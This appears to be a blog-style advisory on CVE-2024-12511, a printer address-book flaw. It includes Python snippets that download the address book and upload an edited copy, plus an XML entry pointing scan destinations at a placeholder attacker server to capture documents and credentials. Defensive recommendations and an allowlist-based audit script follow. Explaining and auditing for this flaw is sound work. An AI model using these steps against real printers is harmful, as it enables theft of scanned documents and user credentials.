A new vulnerability, identified as CVE-2024-12511, has come to light, potentially affecting several printer models and enabling attackers to modify SMB/FTP settings. This post provides an in-depth look into the issue, including code snippets, links to original references, and exploit details. With this vulnerability, an attacker can exploit address book access to redirect scans and possibly capture user credentials. However, the exploit requires enabled scan functions and access to the printer.

Vulnerability Details

CVE-2024-12511 is a security vulnerability in which attackers can access address books stored on printers without restrictions. By accessing the address book, the attacker can modify the SMB/FTP settings on the printer, redirecting scans to a malicious server, and possibly capturing user credentials in the process.

This vulnerability can be exploited only if the printer's scan functions are enabled and the attacker has access to the device.

Exploit

An example of how one might exploit the CVE-2024-12511 vulnerability is provided below. This code snippet demonstrates how an attacker could send an HTTP request to the target printer to fetch the address book stored on the device:

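import os

# Placeholder address of the printer's address book endpoint
url = "http://<target_printer_ip>/addressbook"
# Save the address book returned by the printer to a local file
os.system("wget '{}' -O addressBook.xml".format(url))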

Once the attacker has obtained the address book in an XML format, they can modify the SMB/FTP settings stored in the address book file, replacing the target IP, domain, username, and password fields with malicious data. The attacker can set these fields to redirect scans to their own devices and potentially capture user credentials.

<addressBook>
    <entry>
        <name>Target User</name>
        <ip>attacker_server_ip</ip>
        <domain>attacker_server_domain</domain>
        <userName>attacker_user</userName>
        <password encrypted="true">attacker_password</password>
    </entry>
</addressBook>

After modifying the address book content, the attacker can send another HTTP request to the target printer to upload the modified address book and apply the new settings.

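import requests

# Placeholder address of the printer's address book endpoint
url = "http://<target_printer_ip>/addressbook"
headers = {"Content-Type": "application/xml"}
# Read the edited address book from disk
with open("modifiedAddressBook.xml", "r") as file:
    data = file.read()

# Send the edited address book back to the printer
response = requests.post(url, headers=headers, data=data)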

Now, any user attempting to scan a document on the exploited printer will unknowingly send their documents to the attacker's server, along with their credentials.

For further information on the CVE-2024-12511 vulnerability, please refer to the following sources:

1. CVE Details
2. National Vulnerability Database (NVD)

Recommendations

1. Disable the printer's scanning function if not necessary.
2. Regularly check and verify the SMB/FTP settings on the printer to ensure no unauthorized modifications have been made.
3. Consider implementing network access controls to limit unauthorized printer access.

By staying vigilant and following these recommendations, users can significantly reduce the risk of becoming a victim to exploits like CVE-2024-12511.
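One way to carry out the regular SMB/FTP settings check recommended above is to audit an exported address book against an allowlist of approved scan destinations. This is an added example, not code from the original post or from the printer vendor; it assumes the export uses the element layout shown earlier on this page, and the sample entries, networks, domains and function name are constructed for illustration.

```python
import ipaddress
import xml.etree.ElementTree as ET

# Constructed sample export, using the element layout shown earlier on this
# page (addressBook/entry/name/ip/domain/userName). Real exports may differ.
SAMPLE_EXPORT = """<addressBook>
  <entry><name>Finance Scans</name><ip>10.20.0.15</ip>
    <domain>corp.example</domain><userName>svc_scan</userName></entry>
  <entry><name>HR Scans</name><ip>203.0.113.77</ip>
    <domain>WORKGROUP</domain><userName>svc_scan</userName></entry>
  <entry><name>Legal Scans</name><ip>files.corp.example</ip>
    <domain>corp.example</domain><userName>svc_scan</userName></entry>
</addressBook>"""

# Assumed site policy: where scans are allowed to go.
APPROVED_NETWORKS = [ipaddress.ip_network("10.20.0.0/24")]
APPROVED_DOMAINS = {"corp.example"}


def audit_address_book(xml_text, networks=APPROVED_NETWORKS,
                       domains=APPROVED_DOMAINS):
    """Return (entry name, reason) for each scan destination outside policy."""
    findings = []
    # The export comes from your own device; for files of unknown origin,
    # parse with a hardened XML parser such as defusedxml instead.
    for entry in ET.fromstring(xml_text).iter("entry"):
        name = (entry.findtext("name") or "<unnamed>").strip()
        host = (entry.findtext("ip") or "").strip()
        domain = (entry.findtext("domain") or "").strip().lower()
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            # A hostname cannot be checked against the network allowlist.
            findings.append((name, f"destination {host!r} is not an IP address"))
        else:
            if not any(addr in net for net in networks):
                findings.append((name, f"destination {host} is outside approved networks"))
        if domain not in domains:
            findings.append((name, f"domain {domain!r} is not approved"))
    return findings


if __name__ == "__main__":
    for name, reason in audit_address_book(SAMPLE_EXPORT):
        print(f"[!] {name}: {reason}")
```

Running the audit on a schedule and alerting on any finding surfaces a redirected scan destination before users send documents to it.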

Timeline

Published on: 02/03/2025 20:15:32 UTC